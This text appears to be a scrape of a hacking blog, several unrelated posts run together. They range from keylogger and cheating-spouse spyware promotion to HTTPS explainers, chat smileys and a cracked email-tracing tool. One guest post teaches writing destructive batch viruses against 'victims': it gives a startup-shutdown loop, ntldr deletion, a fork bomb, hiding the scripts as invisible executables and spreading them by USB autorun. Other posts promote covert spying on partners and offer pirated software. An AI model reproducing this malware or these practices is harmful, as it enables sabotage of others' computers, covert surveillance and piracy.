A few weeks back I told you about mybook on Ethical Hacking which was launched on 15th of august. I have had lots of sales and also have received the feedback from the readers and webmasters which have read it, so I though you to share the testimonials with you. Below are Few of the Testimonials I have received so far:
I will be updating this page frequently as soon as I receive new Testimonials, If you are a Beginner and would like to know How Hackers Hack computer systems, Networks, Facebook ,Orkut or Gmail accounts etc so I suggest you reading my book "A Beginners Guide To Ethical Hacking"
Mcafee claims its products to be top and most popular security product, Today I heard about Mcafee url shorting service, As I visited the Mcafee Url shortning website, I found that they claimed that their url shortner is safe and secure.
So I thought to test it, I created a Facebook fake login page and tried to shorten it with Mcafee url shortner, hoping that it was detect it and will not allow to shorten it, but I was shocked to see that Mcafee actually showed that the website is safe, see the image below:
As lots of people trust on mcafee and a hacker could take an advantage of Mcafee Url shortning service and steal thousands of email accounts, this shows that one should not always rely on softwares for security,
I continue the series of providing you with information of best spware keylogger softwares availible online.In this post i will tell you about all the best spyware products availible for various purposes.Today there exists many of spyware keylogger softwares because a lot of people want to monitor the activities of their children, spouse, friends etc.Most of people try to find thier crack version or serial key and end them self in infecting their PC with Viruses.Most of people are confused with selection b/w Spyware keylogger software,so today the Title of my post is "Which spyware keylogger software to choose?" What exactly is a Monitoring Software and how can it help me ?
A computer monitoring software is just like any other software (program) which when installed, secretly monitors each and every activity that takes place on the computer. The activities such as web browsing, chatting, gaming etc. are all recorded and saved. These monitoring softwares can record each and every keystroke. So it is possible to capture usernames and passwords very easily with minimum effort. Monitoring softwares are also commonly known as Keyloggers.
How can i install a spyware keylogger software? Installing a spyware keylogger software is very simple,even a person with basic knowledge of computer can use and monitor each and every activity that takes place on the computer.You need to setup a secret password and hotkey combination which is required later to see the recorded data ( logs). After the installation is complete the software goes invisible,once the software gets installed it will sent you recorded data(logs) and screen shots of the activities that takes place on your computer.
Which spyware keylogger software to choose?
There exists different flavours of these softwares and you have to choose the one that best match your needs. Here is a list of some of the best monitoring programs that I recommend.
For monitoring your own PC:
If you want to monitor your own PC you can i recommend the following spyware software: Spyagent:
Spytech SpyAgent is our award winning, powerful computer spy software that allows you to monitor EVERYTHING users do on your computer - in total stealth. SpyAgent provides a large array of essential computer monitoring features Click here to goto official website of spyagent
Keystroke spy: Keystroke Spyis a powerful tool that can log every keystroke users type and capture screenshots of their activities. Keystroke Spy can run in total stealth, email you when specific keywords are typed, and can even be set to only log keystrokes typed in specific applications. With Keystroke Spy you will be able to log websites users visit, emails they send, passwords they use, applications they interact with, typed documents, and see everything they did with visual screenshot playback!
Realtime spy:Realtime-Spy is a remote spy software solution that requires no physical installation, and is the first product to allow you to truly view activity logs from any location at any time!
IF you want to monitor an entire network then the following software is very useful
Netvizor:
NetVizor is network monitoring software that invisibly monitors your entire network from one central location! Track workstations and users that may use multiple PC's on your network. Deploy NetVizor from one location and record everything users do, including screenshots, keystrokes typed, program and internet usage, emails and chats, file/document usage, and much more. Generate detailed activity reports in seconds, view your entire network in real-time, and receive instant behavior alerts when unwanted activities occur. This software becomes handy if you want to monitor an entire network including your offices,school etc. You can test this product by downloding its trial version.
I get lots of question regarding Spyware keylogger that,Do they on Mac OS the answer is know,the above softwares wont wok on Mac os,For Mac OS Rafayhackingarticles recommends the following software
Aobo Mac OS X Keylogger for Mac:
Abobo Mac OS x is The only Keylogger for Mac OS X which can Record Passwords Aobo Mac OS X Keylogger for Mac OS X is the best Mac keylogger on the market with remote monitoring support. It supports stealth keystroke recording, screenshots capturing and sending the logs by email or FTP in a real time.
Are you curious to know if your wife or your husband is cheating on you, Some studies reveal that:
Only 46% of men believe that online affairs are adultery. (DivorceMag)
Up to 37% of men and 22% of women admit to having affairs. Researchers think the vast majority of the millions of people who visit chat rooms, have multiple "special friends". (Dr. Bob Lanier, askbob.com)
One-third of divorce litigation is caused by online affairs. (The Fortino Group)
Approximately 70% of time on-line is spent in chatrooms or sending e-mail; of these interactions, the vast majority are romantic in nature. (Dr. Michael Adamse, PhD., co-author of "Affairs of the Net: The Cybershrinks' Guide to Online Relationships")
How to catch cheating spouse is an ebook which will guide you step by step to catch a cheating spouse, With How to catch a cheating spouse its a cake walk for you to catch a cheating spouse. Whether your partner has just started having an affair, been having an affair for a while, or just ended an affair, it doesn’t matter. I’ll show you how to get the solid evidence you need that will leave no room for excuses or alibis.
Bonuses
You will get the following Bonuses along with this book:
So what are you waiting for Grab your hands on Spouse catching Book and know if you your partner is cheating on your, For download links visit the link below: Spouse Catching book
According to wikipedia a batch file is a text file containing a series of commands intended to be executed by the command interprete, In this article I will be telling you the basics of batch files clear and developing the approach towards coding your own viruses. Lets begin with a simple example ,
Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes. Now type these commands one by one
1. md x //makes directory 'x' on desktop 2. cd x // changes current directory to 'x' 3. md y // makes a directory 'y' in directory 'x'
We first make a folder/directory 'x', then enter in folder 'x',then make a folder 'y' in folder 'x' . Now delete the folder 'x'. Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat
Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we run the batch file
So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.
What can batch viruses do ?
They can be used to delete the windows files, format data, steal information,consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.
Now lets start with simple codes,
Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.
1.
:x start cmd.exe goto x // infinite loop
This code will be opening command prompt screen infinite times , irritating victim and affecting performance. 2. copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup” copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP) shutdown -s -t 00 //this will shutdown the computer in 0 seconds
Note : Files in Start up folder gets started automatically when windows starts .
Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.
3. Goto C drive in Win XP , Tools->Folder Option->View Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply
Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.
Lets make a batch file to delete this file from victim's computer and the windows will not start then. attrib -S -R -H C:\ntldr // -S,-R,-Hto clear system file attribute, read only attribute , hidden file attribute respectively del C:\ntldr //delete ntldr file After ruuning this batch file , system will not reboot and a normal victim would definitely install the windows again. 4.%0|%0 //Its percentage zero pipe percentage zero
This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows This is actually known as 'fork bomb'.
The viruses we just coded -:
Note : Most of the batch viruses are simply undetectable by any anitiviruses Tip : Coding good viruses just depends on the DOS commands you know and logic you use.
Limitations of Batch Viruses -:
1.Victim can easily read the commands by opening batch file in notepad. 2.The command prompt screen pops up,it alerts the victim and he can stop it.
To overcome these limitations,we need to convert these batch files into executable files that is exe files. Download this Batch To Exe coverter from here. http://www.mediafire.com/?uhsc5tfkd5dbn65 After running converter , open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.
You can use other options as per your requirement.
Spreading batch viruses through pen drive -: Step 1. Open notepad and write
[autorun] open=anything.bat Icon=anything.ico
Save file as ‘autorun.inf’ Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .
When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.
About The Author
This is a guest post written by Aneesh M Makker. Aneesh M.Makker is an Ethical hacker from Malout, a town in Punjab.Click here to visit his Facebook Profile
You might have heard some times that not to give your password or credit card information or any other sensitive information on public computers or on Msn, yahoo etc chats.The reason why you might have heard that the Hackers have some ways to you would have probably heard that hackers have a way to steal your your credit card numbers , passwords etc. A hacker can use different types of attacks such as Packet sniffing or ARP Poisoning to steal your sensitive information
Secure Sockets Layer (SSL) is the most widely used technology for creating a secure communication between the web client and the web server. You must be familiar with http:// protocol and https:// protocol, You might be wondering what they mean. HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a secure communication.
Cryptography
If two users want to have a secure communication they can also use cryptography to accomplish it
For example:
TFDVSF=Encrypted Text
SECURE= Decrypted Text
You might be wondering how i Decrypted it, Here i have used Algorithm=+ for the communication and the key is "1", What comes after S is T so as you can see that S is converted into T, What comes After E is F to letter E from the word secure if converted into F and so on, To help you understand this more better I am adding a Video
So If the hacker starts sniffing from between he will get Encrypted text and as the Hacker does not know the keys so he cant decrypt it, but if the attacker or hacker is sniffing from the starting point so he will get the key and can easily Decrypt the data
Standard Communication VS Secure communication
Suppose there exists two communication parties A (client) and B (server)
Standard communication(HTTP)
When A will send information to B it will be in unencrypted manner, this is acceptable if A is not sharing Confidential information, but if A is sending sensitive information say "Password" it will also be in unencrypted form, If a hacker starts sniffing the communication so he will get the password.This scenario is illustrated using the following figure
Secure communication(HTTPS)
In a secure communication i.e. HTTPS the conversation between A and B happens to be in a safe tunnel, The information which a user A sends to B will be in encrypted form so even if a hacker gets unauthorized access to the conversion he will receive the encrypted password (“xz54p6kd“) and not the original password.This scenario is illustrated using the following figure
How is HTTPS implemented?
A HTTPS protocolcan be implemented by using Secure Sockets Layer (SSL), A website can implement HTTPS by purchasing SSL certificate.
Which websites need SSL Certificate?
The websites where a private conversation is occurred, Websites related to online transactions or other sensitive information needs to be protected needs to SSL Certificate
How to identify a Secure Connection?
In Internet Explorer and google chrome, you will see a lock icon in the Security Status bar. The Security Status bar is located on the right side of the Address bar. You can click the lock to view the identity of the website.
If you are making an online transaction through Credit card or any other means you should check if https:// secured communication is enabled.
Counter strike is the #1 online action game in the world, and CS 1.6 its most popular version, I was mad at counter strike few years back , but for now it has been more than one year since I haven't played it for last 1 year as I have no time for it.
Counter strike 1.6 can be played online for free, the only requirement is that you should have a fast Internet connection or else you will not enjoy playing it will hang every few seconds, There are tons of methods to play Counter strike 1.6 online for free but I am writing a method which is very easy to implement and also very user friendly
How to play Counter Strike 1.6 online(Method)
1.First of all install counter strike 1.6 on your computer
2.Next you need to have list of cs1.6 free public servers on which you can play, One of the sites where you can find List of CS 1.6 Free public servers is:
http://www.gametracker.com/search/cs/
4..Start your cs 1.6 game
5.Go to find server,then goto favorite
6.Right click there and select add server by ip Address
7.Now paste the server ip address which you have copied.
In the similar manner you can add more Servers to your game to play online, There are tons of free CS 1.6 servers available where you can play Counter Strike 1.6 Online for free
As you know that passwords are the only form of security available now a days, Its really important for one to create a strong passwords, Keeping a weak passwords can make you vulnerable to attacks such as Brute force, Dictionary attacks, Rainbow Tables etc. So in this article I will tell you to create a strong password so you can secure your account from getting hacked
What makes a strong password?
A password can be considered strong if it contains following things:
It needs to contain special characters such as @#$%^&
It must be at least 8 characters long.
It must not have any common words such as 123, password, your birth date, your login name and any words that can be found in the dictionary,(This will prevent you from getting hacked by a Dictionary Attack)
a variation of capitalization and small letters
Alternatively there is a website named www.strongpasswordgenerator.com which automatically generates a strong password for you, The website allows you to choose a password length and also gives you hints through which you can easily memorize the password
Facebook is the most widely used Social Networking website in the world having the most advanced features, but instead of having so many features most people are not able to use it or they don’t know to use ,There are lots of smileys in Facebook chat but lots of people dont know about it, You can you smileys in Facebook chat and increase your Chatting experience, below I am placing a chart which will contain smileys in Facebook chat along with their code
You can also use bold fonts or underlined fonts in facebook chat. To use bold fonts type your message between two asterisks. e.g. *message* To type underlined messages type your message between two underscores. e.g. _message_ If you know some more Smileys in Facebook chat kindly share through commenting.
The area of Mac security software is fairly broad to Mac users. The primary aspects of security software for the Mac are antivirus programs, patches and updates for the Mac OS X, and updates from commonly used applications such as web browser Safari, Adobe Shockwave, and Google Chrome.
In general, Mac users should be kept up-to-date on security fixes for all of the listed primary items above. Applying fixes will be automatic in the case of a program like Google Chrome while the Adobe Shockwave product will inform you of updates so long as you are connected to the Internet. Security vulnerabilities can reach in to Mac email applications as well to where you have what are known as botnets putting out spam email messages using your Mac. That is why you want an antivirus program that is robust and will provide you with security monitoring for emails as well as your hard disk and web site usage. Along with that, it is important to stay current on the latest Mac OS X fixes that apply to your operating system. Checking with Apple's website to ensure your current with security fixes is a good way to confirm the facts. There are also web blogs particular to Mac users that will indicate the latest Mac security software issues and fixes for widely-used products such as Safari.
Antivirus programs are plentiful for the latest Mac OS X versions in use. It becomes harder to find support for antivirus software on older Mac OS X versions. Be aware of end-of-life software so that you are not caught short when it comes to security. The latest trojan horse viruses that are attacking Mac users are also a good thing to be aware of even if you have solid antivirus program software.
Computer security is a big issue and is constantly playing catch up to those who exploit operating systems flaws, browser code weaknesses, and application program security flaws. Security flaws also exist in such ancillary programs the Mac uses such as Java. Java is used heavily for web-based communications and applications. Exploitations of Java can lead to corruption of your local system hard disk and data files.
To avoid suffering the maladies of a compromised Mac computer system, always stay on top of the latest Mac security softwarefixes and visit trusted web sites while quickly aborting any unfamiliar web site to you that you were referred to or found wherein you see a lot of pop up advertising and free software checks of your Mac hard disk or statements about your Mac may be infected.
For those Mac users that also run a Windows volume or partition, it is wise to have an equally running antivirus program on the Windows side. There are viruses that will go between both the Windows and Mac sides of your Mac computer. In fact, MS Office products that use visual basic along with macro commands are notorious for impacts from malware and trojans.
The use of a robust antivirus program that will monitor both your Windows and Mac volumes, folders and files is that way to go.
Proxies are easiest ways to hide your Identity, However Proxy's are mostly used by fraudsters, scammers and hackers to hide their Identity while committing cyber crimes and therefore in this article I will tell you how to detect those Anonymous IP address
Following are some of the examples where fraudsters use the proxies to hide their actual IP.
Credit Card Frauds
Anonymous IP's are used for credit card frauds,such as cashing out the stolen credit card numbers and stealing the money, When ever a transaction is done from a credit card, the IP address of the computer from where the transaction is made is captured by the Credit card providers, So if the hacker or Fraudster is cashing out from his original location, he will be easily be traced. So to avoid it the Hacker or Fraudster would use a proxy in order to hide his original location and the spoofed IP will be captured by the Credit card providers
Bypassing Restriction
In most offices or schools websites like Facebook, orkut etc and other websites are blocked so people use proxy to bypass the restrictions and unlock the websites
Accessing hacked accounts
In Email service providers like gmail you can find the real IP Address from which you accessed the accounts previously, Say if a hacker has hacked some one's Gmail account and he is monitoring the hacked account, If he will login without a proxy, his real IP will be captured and therefore he will be traced
Proxy Detection Servies
Now a days proxy detection has became a critical component, There some services like Fraud labs and Free Proxy Detector to detect the usage of proxy or spoofed IP from users participating online
How Proxy Detection works?
Proxy detection services mostly rely on IP addresses to determine whether or not the IP is a proxy, they keep a record of the IP's which most proxy's use as a Spoofed IP and therefore by comparing the IP with the list of flagged IP's they could find that the IP is a proxy or not, If the IP is not on the list then it is authenticated and the confirmation is sent back to the merchant. Otherwise it is reported to be a suspected proxy.
Hope you liked the post ! Please Pass the comments
Facebook is the most popular social networking site in the world with an alexa rank of just #2, Recently I have been receiving many emails and I am constantly asked about smileys in Facebook chat, There are lots of smileys in Facebook chat but lots of people dont know about it, You can you smileys in Facebook chat and increase your Chatting experience, Below I am placing 2 charts which will contain smileys in Facebook chat along with their code
Hope you liked the collection of Facebook chat smileys, Feel free to ask by commenting!
The following post is on will tell you some methods to increase your internet speed,I will show you some ways to increase your net and browser speed
Go to Start>>Run and then type in “gpedit.msc” without the quotes (“) Computer Configuration -> Administrative Templates -> Network -> QoS Packet Scheduler. after that, you should see something like “Limit Reservable Bandwidth”. Modify that and set it to “Disabled”, or you can put it to “Enabled” and change the value to 0.
Now this will increase your internet speed by 20%
Increase internet speed - method 2
Below combination will speed up your surfing on the net. it is amazingly fast.
Firefox + IDM + TCP Optimizer
kindly do a speed test of your net connection before & after athttp://speedtest.netto know what difference this software has made.
1) Speed Up the Firefox.
Just do the following steps:
* Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:
Keyloggers have been a major problem today as once they get installed in your computer the hacker can get almost any information, I have written couple of posts on keylogging and reviewed some of the best keyloggers available now a days The program which are specially used to detect and protect your computers from keyloggers are Antiloggers, I have tested lots of Antiloggers and found Zemana Antilogger only which is capable of detecting almost every keylogger. Normally a keylogger is detected by a good antivirus or Antispyware program, but hackers use some methods such as crypting, hexing, binding etc through which the keylogger can easily Antivirus as well as Antispyware program
Zemana AntiLogger now covers pretty much every aspect of Windows including registry modification and dll injection prevention and protects Windows from other spyware-related techniques with Anti-Keylogger, Anti-SreeenLogger,Anti-WebLogger and Anti-ClipboardLogger tools of its own. Another useful feature this apps has is while-list approach (in contrast to Anti-Virus blacklist approach) meaning it automatically recognizes "safe" programs and does not treat them as "suspects"
For more information on this program and download details visit the following link Zemana Antilogger Download
Here are some of the articles I have written on keylogging from the past:
In my previous post I wrote on How to trace a sender in gmail, however the method was a bit complicated and lots of users were not able to understand, In this article I will tell you to use a great peice of software Email Tracker pro to trace an email, Email tracker pro can trace and track email back to the senders location. Stop SPAM email and phishing email with email tracker pro. The latest version of Email tracker pro is V9, however the program is not free and you will not find many working serials on the web, So I use Email tracker pro v8 for demonstration as I am already placing its crack below:
Trace an Email using emailtrackerpro
Follow the steps below to use Email tracker pro v8 to trace an Email
2. Open Email tracker pro and click on Trace an email
3. Now you need to paste the Email headers in it, For Gmail I have already demonstrated on how to get Gmail headers in my previous post How to trace a sender in Gmail?, but if you want to trace a hotmail, yahoo or any other email and you are not sure how to get email headers kindly google it
4. Once you click on trace button, it will start tracing and will show you the appropriate location of the email sender